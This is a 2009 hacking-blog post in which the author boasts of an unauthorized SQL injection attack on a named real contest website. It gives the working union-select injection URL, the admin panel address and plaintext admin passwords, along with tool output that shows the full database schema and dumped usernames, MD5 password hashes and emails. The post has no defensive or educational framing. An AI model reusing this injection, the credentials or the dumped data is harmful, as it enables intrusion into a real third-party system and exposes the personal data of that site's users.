viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Sunday, March 22, 2009

[SQLi] http://www.queenbeehunt.com

11:14 PM Posted by viperfx07 No comments
I can't enjoy hacking as much as i could. It's really annoying. Below is my first hack in this month and it's unintended.

Tool: schemafuzz.py v5.0 mod by me & IntelliTamper
Admin panel: http://www.queenbeehunt.com/magnm/
Admin usr/pwd: admin:admin or andy:admin



[+] URL:http://www.queenbeehunt.com/finalist/?detail=87+and+1=2+union+select+1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 22:38:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: soprano_qbround2
User: soprano_qbround2@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "soprano_qbround2"
[+] Number of Tables: 10


[Database]: soprano_qbround2
[Table: Columns]
[0]comment: id_comment,comment,id_contestant,id_submission,name,email,publish,posted_on
[1]comment_contestant: id_comment_contestant,comment,id_contestant,id_contestant_comment,name,email,publish,posted_on
[2]contestant: id_contestant,name,user_name,password,real_password,image,thumbnail,last_login,score,hit_counter,comment_counter,address,personal_quote,email,bday,city,post_code,mobile_number,home_number,school,know,know_description,joined_on
[3]member: id_member,name,email,address,bday,city,post_code,mobile_number,home_number,school,know,know_description,personal_quote,score,photo,joined_on
[4]mission: id_mission,title,content,publish,posted_on
[5]news: id_news,title,content,image,thumbnail,publish,posted_on
[6]role: id_role,role_description
[7]submission: id_submission,title,content,image,thumbnail,video_link,id_contestant,id_mission,hit_counter,publish,posted_on
[8]tell_friend: id_tell_friend,id_contestant,name,email,friend,friend_email,sent_on
[9]user: id_user,username,name,password,email,user_role,last_login,join_date

[-] [22:53:59]
[-] Total URL Requests 117
[-] Done


[+] URL:http://www.queenbeehunt.com/finalist/?detail=87+and+1=2+union+select+1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 22:55:42
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: soprano_qbround2
User: soprano_qbround2@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "soprano_qbround2" Table "user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 2

[0] admin:21232f297a57a5a743894a0e4a801fc3:no_more_distance@yahoo.com:
[1] andy:21232f297a57a5a743894a0e4a801fc3:donald@duck.co:donald@duck.co:

[-] [22:56:13]
[-] Total URL Requests 4
[-] Done